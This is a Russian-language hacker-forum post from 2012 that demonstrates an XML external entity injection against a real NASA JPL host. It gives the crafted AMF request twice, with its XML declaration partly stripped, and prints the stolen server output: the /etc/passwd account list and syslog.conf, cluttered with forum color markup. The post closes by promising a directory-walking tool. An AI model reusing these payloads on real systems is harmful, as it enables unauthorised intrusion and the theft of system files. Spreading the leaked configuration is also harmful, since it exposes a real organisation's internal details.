19.05.2012, 17:33
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
XML-Inject на NASA.GOV
Отправляем специально сконфигурированный пакет:
PHP код:
[COLOR="#000000"]Content-Type = 'application/x-amf';
Host = 'informal.jpl.nasa.gov';
Content-Length = '904'; //тут длина вашего запроса. Величина варьируется
Request.Data = '[COLOR="#0000BB"]
[/COLOR] ]>
bodyclientIdcorrelationId
destinationheadersmessageId
operationtimestamptimeToLive
DSIdDSMessagingVersion
nil1
&x3;
500
[/COLOR]
На что видим ответ
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Response[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Data[/COLOR][COLOR="#007700"]=
[/COLOR][COLOR="#0000BB"]root[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Super[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]User[/COLOR][COLOR="#007700"]:/:/[/COLOR][COLOR="#0000BB"]sbin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sh
daemon[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]::/:[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]::/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]false
sys[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]::/:[/COLOR][COLOR="#0000BB"]adm[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Admin[/COLOR][COLOR="#007700"]:/var/[/COLOR][COLOR="#0000BB"]adm[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]false
lp[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]71[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Line Printer Admin[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]spool[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]lp[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]false
uucp[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]uucp Admin[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]lib[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uucp[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]false nuucp[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]uucp
Admin[/COLOR][COLOR="#007700"]:/var/[/COLOR][COLOR="#0000BB"]spool[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uucppublic[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]false smmsp[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]SendMail
Message Submission Program[/COLOR][COLOR="#007700"]:/:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]false listen[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]37[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Network
Admin[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]net[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]nls[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]false gdm[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]50[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]50[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]GDM
Reserved UID[/COLOR][COLOR="#007700"]:/:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]false webservd[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]80[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]80[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]WebServer
Reserved UID[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]opt[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]home[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]webservd[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]pfsh
postgres[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]90[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]90[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]PostgreSQL Reserved UID[/COLOR][COLOR="#007700"]:/:/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]pfksh
svctag[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]95[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Service Tag UID[/COLOR][COLOR="#007700"]:/:[/COLOR][COLOR="#0000BB"]nobody[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]60001[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]60001[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]NFS
Anonymous Access User[/COLOR][COLOR="#007700"]:/:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]false noaccess[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]60002[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]60002[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]No
Access User[/COLOR][COLOR="#007700"]:/:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]false nobody4[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]65534[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]65534[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]SunOS 4.x NFS
Anonymous Access User[/COLOR][COLOR="#007700"]:/:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]false metrics[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]150[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]System
Metrics Account[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]opt[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]metrics[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sh pdiag[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]153[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Patchdiag
Account[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]opt[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]pdiag[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sh sysaudit[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]152[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]System Audit
Account[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]opt[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sysaudit[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]bin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sh[/COLOR][COLOR="#007700"]+@[/COLOR][COLOR="#0000BB"]jplit[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]sa[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]:::::: +@[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]::::::[/COLOR][/COLOR]
Вариация первого запроса:
PHP код:
[COLOR="#000000"]Content-Type = 'application/x-amf';
Host = 'informal.jpl.nasa.gov';
Content-Length = '904'; //тут длина вашего запроса. Величина варьируется
Request.Data = '[COLOR="#0000BB"]
[/COLOR] ]>
bodyclientIdcorrelationId
destinationheadersmessageId
operationtimestamptimeToLive
DSIdDSMessagingVersion
nil1
&x3;
500
[/COLOR]
На что видим ответ
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Response[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Data[/COLOR][COLOR="#007700"]=
[/COLOR][COLOR="#FF8000"]#ident "@(#)syslog.conf 1.5 98/12/14 SMI" /* SunOS 5.0 */ #
# Copyright (c) 1991-1998 by Sun Microsystems, Inc.
# All rights reserved. #
# syslog configuration file. #
# This file is processed by m4 so be careful to quote (`') names
# that match m4 reserved words. Also, within ifdef's, arguments
# containing commas must be quoted. #
# JPLIT syslog.conf # last updated 2008-06-24
# *.err;kern.notice;auth.notice /dev/sysmsg *.info;kern.debug;auth.err;mail.crit;local0.crit
[/COLOR][COLOR="#007700"]/var/[/COLOR][COLOR="#0000BB"]adm[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]messages
[/COLOR][COLOR="#007700"]*.[/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]kern[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]err[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]daemon[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]err operator
[/COLOR][COLOR="#007700"]*.[/COLOR][COLOR="#0000BB"]alert root[/COLOR][COLOR="#007700"]*.[/COLOR][COLOR="#0000BB"]emerg
[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]auth[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]notice[/COLOR][COLOR="#007700"]/var/[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]authlog mail[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]info[/COLOR][COLOR="#007700"]/var/[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]syslog
[/COLOR][COLOR="#FF8000"]# Log ipfilter info separately: local0.info /var/log/ipflog
# if a non-loghost machine chooses to have authentication messages
# sent to the loghost machine, un-comment out the following line:
#auth.notice ifdef(`LOGHOST', /var/log/authlog, @loghost) #mail.debug ifdef(`LOGHOST', /var/log/syslog, @loghost) #
# non-loghost machines will use the following lines to cause "user"
# log messages to be logged locally. # ifdef(`LOGHOST', , user.err /dev/sysmsg user.err /var/adm/messages user.alert `root, operator' user.emerg * ) # #
# Uncomment this line to send syslog data to JPL Security:
# *.err;daemon.notice;auth.info @jplnsm.jpl.nasa.gov
# 3DB8AF0E-381B-5C34-E477-F5E594ECC3360.03DB8AF0E-380E-7324-6A71-ABBB0CDA7BAF[/COLOR][/COLOR]
Скоро выложу самописную утилитку для прогулки по директориям =)
|
|
|